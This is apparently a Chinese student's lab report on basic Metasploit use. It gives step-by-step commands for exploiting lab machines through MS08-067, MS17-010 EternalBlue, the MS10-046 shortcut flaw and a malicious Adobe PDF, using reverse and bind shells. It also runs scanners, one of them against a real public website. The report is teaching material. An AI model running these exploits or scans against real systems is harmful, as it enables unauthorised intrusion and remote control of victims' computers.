标签:msf exploit payload encode
search name
:用指定关键字搜索可以利用的漏洞模块use exploit name
:使用漏洞show options
:显示配置选项set option name option
:设置选项show payloads
:回链攻击载荷show targets
: 显示目标(os版本)set TARGET target number
:设置目标版本exploit
:开始漏洞攻击sessions -l
:列出会话sessions -i id
:选择会话sessions -k id
:结束会话Ctrl+z
:把会话放到后台Ctrl+c
:结束会话show auxiliary
:显示辅助模块use auxiliary name
:使用辅助模块set option name option
:设置选项exploit
:运行模块4VAk
nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.196.141
查看到靶机的版本号,并且查看到靶机存在ms08_067这个漏洞
输入指令 msfconsole
进入控制台,使用指令 search ms08_067
指令查询一下针对该漏洞能够运用的攻击模块
use exploit/windows/smb/ms08_067_netapi
进入该攻击模块,使用 show payloads
查看能够使用的攻击载荷shell_reverse_tcp
,输入指令 set payload generic/shell_reverse_tcp
设置payload为反向tcp连接show options
set RHOST 192.168.196.141 //设置靶机IP
set LPORT 5121 //设置攻击机端口
set LHOST 192.168.196.133 //设置攻击机IP
exploit
systeminfo
来查看靶机的系统信息,关于计算机及其操作系统的详细配置信息,包括操作系统配置、安全信息、产品 ID 和硬件属性,RAM、磁盘空间和网卡等。nmap --script=vuln 192.168.196.135
查看 win7有什么漏洞可以利用search ms17_010
指令查询一下针对该漏洞能够运用的攻击模块use exploit/windows/smb/ms17_010_eternalblue
进入该攻击模块,使用 show payloads
查看能够使用的攻击载荷windows/x64/meterpreter/bind_tcp
,输入指令 set payload windows/x64/meterpreter/bind_tcp
设置payload为绑定tcp连接set RHOST 192.168.196.135 //设置靶机IP
set LPORT 5121 //设置攻击机端口
set LHOST 192.168.196.133 //设置攻击机IP
exploit
cd/usr/share/metasploit-framework/modules/exploits/windows/browser
ms10_046_shortcut_icon_dllloader.rb
search ms10_046
先找相关漏洞模块use windows/browser/ms10_046_shortcut_icon_dllloader
,使用show payloads
查找有效攻击载荷set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.196.133 //设置攻击者IP
set SRVHOST 192.168.196.133 //设置服务器IP(攻击者IP)
exploit //进行攻击
http://192.168.196.133:80/
sessions
sessions -i 1
search adobe
查询针对adobe攻击模块use windows/fileformat/adobe_cooltype_sing
设置模块show payloads
查找有效攻击载荷set payload windows/meterpreter/bind_tcp
设置payloadsset RHOST 192.168.196.141 //靶机ip
set LPORT 5121 //攻击端口
exploit //生成pdf
cp /root/.msf4/local/msf.pdf /home/kali/20175121yb
back
退出当前模块,进入监听模块use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
set RHOST 192.168.196.141 //靶机IP
set LPORT 5121 //攻击端口
exploit
show auxiliary
查看所有的辅助模块scanner/steam/server_info
,输入info scanner/steam/server_info
查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。use scanner/steam/server_info
使用漏洞set RHOSTS 192.168.196.140
为起始IPexploit
开始攻击use auxiliary/scanner/http/dir_scanner
设置模块set THREADS 50
set RHOSTS www.baidu.com
exploit
dir_scanner 模块发现了百度网站目录的 cache http 状态码200 ,表示请求成功
端口扫描模块
具体有以下几种扫描方式:
auxiliary/scanner/portscan/ack
:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测auxiliary/scanner/portscan/ftpbounce
:通过FTP bounce攻击的原理对TCP服务进行枚举,在一些旧的Solaris及FreeBSD系统的FTP服务中此类攻击方式仍能被利用。auxiliary/scanner/portscan/syn
:使用发送TCP SYN标志的方式探测开放的端口auxiliary/scanner/portscan/tcp
:通过一次完整的TCP连接来判断端口是否开放auxiliary/scanner/portscan/xmas
:通过发送FIN、PSH、URG标志,相对而言较为隐蔽。试试 tcp 扫描,通过一次完整的TCP连接来判断端口是否开放
输入use auxiliary/scanner/portscan/tcp
设置模块
设置参数
set RHOSTS 192.168.196.141 //靶机IP
set THREADS 50
exploit
通过本次实验,我了解了msf的各种具体应用,体会到了其强大的功能。在实验过程中遇到了各种各样的问题,最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info。虽然遇到了各种困难,但是最终都一一解决了,经过这次实验,我的姿势水平又有了一点小小的提升,虽然遇到困难让人抓狂很通过,但是完成之后感到收获的时候还是蛮有成就感的。
如果要考虑实战,我认为首先要想办法如何连接目标机器或将后门程序植入目标机器,不然再大的漏洞我们也利用不了,可以通过社会工程学了解对方用户的个人喜好,发送钓鱼邮件。我们还需要了解目标主机是什么版本的系统,是否打了哪些补丁,是否有adobe这些软件等。除此之外,我的免杀技术还不行,现在还不能很好地实现真正意义上的免杀;还有就是我制作的后门程序都很简单,,一般人看都看出来是不正经软件了。
2019-2020-4 20175121杨波《网络对抗技术》Exp6 msf基础应用
原文:https://www.cnblogs.com/xposed/p/12783276.html